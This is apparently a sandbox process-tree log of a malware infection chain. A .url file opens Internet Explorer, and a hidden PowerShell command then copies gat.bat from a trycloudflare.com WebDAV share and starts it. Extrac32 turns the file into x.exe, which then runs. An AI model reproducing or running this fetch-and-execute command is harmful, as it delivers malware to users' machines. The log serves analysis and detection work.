iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\pinky.url
2628iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2628 CREDAT:145409
2764powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\rounds-cams-rebecca-polls.trycloudflare.com@SSL\DavWWWRoot\gat.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\gat.bat\" -WindowStyle Hidden"
3056extrac32.exe extrac32 /y "C:\Users\test22\Downloads\gat.bat" "C:\Users\test22\AppData\Local\Temp\x.exe"
884x.exe "C:\Users\test22\AppData\Local\Temp\x.exe"
1096